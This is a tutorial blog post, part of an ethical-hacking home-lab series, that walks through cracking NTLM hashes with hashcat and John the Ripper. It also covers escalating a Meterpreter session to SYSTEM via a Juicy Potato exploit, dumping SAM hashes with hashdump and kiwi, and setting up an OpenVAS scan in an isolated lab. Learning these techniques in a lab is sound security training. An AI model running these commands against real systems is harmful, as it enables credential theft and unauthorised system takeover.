July 11, 2026
Building a Virtual Ethical Hacking Home Lab — Part 7: Password Cracking and Vulnerability…
An interactive guide for building your very own ethical hacking home lab using VMware

By Abdul-mu'min Omotola
7 min read
Banner Inspired by: David Varghese
In this episode, we shift from system exploitation to what attackers do after gaining access: extracting credentials and identifying system weaknesses at scale.
This lab focuses on:
- Hashcat Benchmark
- Creating NTLM Hashes
- Mask Attacks (When Pattern Is Known)
- Dictionary Attacks
- Cracking Without a Wordlist
- Hash Identification & Strategy
- Dumping Real Hashes
- Dumping Windows Account Hashes
- OpenVAS (Greenbone) Vulnerability Assessment
Hashcat Benchmark
Before cracking passwords, we measure system cracking performance.
hashcat -b -m 5600hashcat -b -m 5600
-b→ benchmark mode-m 5600→ NetNTLMv2
The output shows speeds such as MH/s, KH/s, GH/s, representing how many hashes can be tested per second. Higher speed = faster cracking capability.
Creating NTLM Hashes
We simulate stolen Windows credentials.
Use an NTLM hash generator and create hashes for:
Password04$house123PasswordhackerMeatballs1
Save them:
nano ntlm_hashes.txtnano ntlm_hashes.txtEach line = one hash.
NTLM is used in Windows authentication and is common in breaches.
Mask Attacks (When Pattern Is Known)
Mask attacks are used when we know password structure.
Crack "Password04$"
Run Command
hashcat -m 1000 -a 3 ntlm_hashes.txt ?u?l?l?l?l?l?l?d?d$hashcat -m 1000 -a 3 ntlm_hashes.txt ?u?l?l?l?l?l?l?d?d$So instead of trying billions of random guesses, it only tries combinations that look like:
What You See in the Output
Example:
Speed.#1.........: 820.5 MH/s
Progress.........: 456789012/1820000000
Recovered........: 1/5 (20.00%)Meaning:Speed.#1.........: 820.5 MH/s
Progress.........: 456789012/1820000000
Recovered........: 1/5 (20.00%)Meaning:When It Succeeds
You'll see:
5f4dcc3b5aa765d61d8327deb882cf99:Password04$5f4dcc3b5aa765d61d8327deb882cf99:Password04$This means:
Hash → Password mapping is complete.
Hashcat then stores it in:
hashcat.potfilehashcat.potfileYou can confirm later with:
hashcat -m 1000 ntlm_hashes.txt --showhashcat -m 1000 ntlm_hashes.txt --show
Note: I cracked a password with a very weak policy (1234) to reduce the cracking time for the purpose of demonstration. You will leave hascat to run much longer in order to crack Password04$
Mask attacks are extremely powerful when password policy is known.
Crack "house123" Using Full Charset
hashcat -m 1000 -a 3 ntlm_hashes.txt ?a?a?a?a?a?a?a?ahashcat -m 1000 -a 3 ntlm_hashes.txt ?a?a?a?a?a?a?a?a?a = all characters (letters, numbers, symbols)
This is slower that but flexible.
Dictionary Attacks
Dictionary attacks use real leaked passwords.
First, download rockyou
Decompress the .gz file with the following commands:
gzip –d /home/attacker/Downloads/rockyou.txtgzip –d /home/attacker/Downloads/rockyou.txtUsing Hashcat
hashcat -m 1000 ntlm_hashes.txt /home/attacker/Downloads/rockyou.txthashcat -m 1000 ntlm_hashes.txt /home/attacker/Downloads/rockyou.txt
ℹ️: Rockyou contains millions of real passwords from breaches.
As you can see, it already cracked the passwords.
If passwords don't crack:
echo "Password" >> /home/attacker/Downloads/rockyou.txt
echo "Meatballs1" >> /home/attacker/Downloads/rockyou.txtecho "Password" >> /home/attacker/Downloads/rockyou.txt
echo "Meatballs1" >> /home/attacker/Downloads/rockyou.txtThis will append the passwords to the list
Using John the Ripper
john --format=NT ntlm_hashes.txt
john --show ntlm_hashes.txtjohn --format=NT ntlm_hashes.txt
john --show ntlm_hashes.txt
John applies mutation rules automatically (like Password → Password1).
Cracking Without a Wordlist
For hacker:
john --format=NT ntlm_hashes.txtjohn --format=NT ntlm_hashes.txtJohn uses incremental brute force + rules.
Hash Identification & Strategy
hashid 06DDC11A1EA340A47E8EDC44D42EA716hashid 06DDC11A1EA340A47E8EDC44D42EA716
We are given pattern clues. Instead of brute force, we design a mask:
hashcat -a 3 -m 1000 ntlm_hashes.txt ?u?l?l?l?li?l2?d?d?d?dhashcat -a 3 -m 1000 ntlm_hashes.txt ?u?l?l?l?li?l2?d?d?d?dThis shows how attackers reduce cracking time using intelligence.
Dumping Real Hashes
In the previous episode, we successfully exploited the target and established a Meterpreter session on the Windows machine.
At that stage, we had code execution… but not full control.
There's an important distinction:
- Access ≠ Control
- Shell ≠ SYSTEM
So, to extract credentials and truly own the machine,
we needed privilege escalation.
Step 1: Understanding Our Current Privilege Level
After gaining our Meterpreter session, we verified our access level:
getuidgetuidOutput showed:
NT AUTHORITY\LOCAL SERVICENT AUTHORITY\LOCAL SERVICE
This is a low-privileged service account.
Why this is concerning:
- Cannot dump SAM database
- Cannot access LSASS memory
- Cannot migrate into SYSTEM processes
- Cannot perform hashdump
And when we attempted migrating to a System process ID
Let's choose smss.exe with PID 224
migrate <PID>migrate <PID>We received:
Cannot migrate into this process (insufficient privileges)Cannot migrate into this process (insufficient privileges)
This confirmed that escalation was required.
Step 2: Enumerating Privileges
We checked available privileges:
getprivsgetprivsThe key privilege we were looking for:
SeImpersonatePrivilegeSeImpersonatePrivilege
This privilege allows a process to impersonate tokens of higher-privileged accounts — and it is commonly abused in Windows privilege escalation attacks.
Step 3: Identifying Exploitable Vectors
We then used Metasploit's local exploit suggester:
Let's background the session and use the suggester exploit
background
use post/multi/recon/local_exploit_suggesterbackground
use post/multi/recon/local_exploit_suggester
Set session to 1 and run the exploit
set SESSION 1
runset SESSION 1
run
The module analyzed:
- OS version
- Patch level
- Running services
- Token privileges
It identified multiple potential vulnerabilities.
Since the target was Windows 2008, older kernel exploits were unreliable. We selected a token impersonation attack suitable for this version.
Step 4: Exploiting MS16–075 (Juicy Potato Variant)
Initial attempts with:
exploit/windows/local/ms16_075_reflectionexploit/windows/local/ms16_075_reflectionfailed due to timeout issues.
We adapted and used the Juicy Potato variant:
use exploit/windows/local/ms16_075_reflection_juicyuse exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
runset SESSION 1
run📝: I set to session 2 because that is the ID on my side. Use the corresponding session ID.
This exploit abuses:
- SeImpersonatePrivilege
- Windows COM service authentication
- SYSTEM token impersonation
Let us verify elevation:
getuidgetuidOutput:
NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
We now had full SYSTEM-level control.
Dumping Windows Account Hashes
With SYSTEM privileges obtained, we could now access credential storage.
Step 1: Dumping Hashes from SAM
Inside the SYSTEM session:
hashdumphashdumpThis extracts:
- Local account usernames
- NTLM password hashes
- Relative IDs (RIDs)
The NTLM hash is the target for offline cracking.
Step 2: Using Kiwi (Mimikatz Integration)
If deeper extraction is required:
load kiwi
lsa_dump_samload kiwi
lsa_dump_sam
This method is more powerful and flexible than basic hashdump.
Step 3: Preparing for Offline Cracking
We saved the extracted hashes:
nano hashes.txtnano hashes.txtThen cracked them offline using Hashcat:
hashcat -m 1000 hashes.txt rockyou.txthashcat -m 1000 hashes.txt rockyou.txtWhere:
-m 1000= NTLMhashes.txt= dumped hashesrockyou.txt= wordlist
Follow the above commands and use the steps we did in part 3 & 4
OpenVAS (Greenbone)
This is automated vulnerability scanning. Greenbone is another tool we use for that purpose.
Setup
Download Greenbone VM It is 7GB
Import into VMware
On your Workstation, navigate to Edit virtual machine settings and change the network adapter to Host-only
Start Greenbone and get IP
Here, the IP is 192.168.52.137
On your Kali, open web browser and type in the IP address of Greenbone
The browser shows a security risk warning
Click Advanced…
Accept the Risk and Continue
This takes us to the web interface
Login with the default credentials
Username: admin | Password: admin
On the Greenbone dashboard, click Tasks
Click the magic wand symbol
Select Advanced Task Wizard
It will open the task window
Select the Full and fast scan and type your Metasploitable3 IP address
Click Create
The scan is now queued
So, we've come to the end of password cracking episode
This lab demonstrated how quickly weak passwords can be recovered once hashes are obtained. Using tools like Hashcat and John the Ripper, we transformed NTLM hashes into plaintext credentials through structured attack strategies such as dictionary and rule-based attacks.
The key takeaway is clear:
password strength is a critical security control. Once hashes are extracted, offline cracking bypasses account lockouts and monitoring, making weak credentials a serious risk.
Understanding how passwords are cracked is essential to understanding how they should be defended; through strong password policies, multi-factor authentication, and proper credential management.
See you in the next episode.
If you liked what you just read, consider:
◆ Dropping a comment to show your support
◆ Sharing the article with others who will find it useful
◆ Follow me on medium and LinkedIn
◆ If you're following the setup for this lab and you come across any technical issue, feel free to reach me through WhatsApp.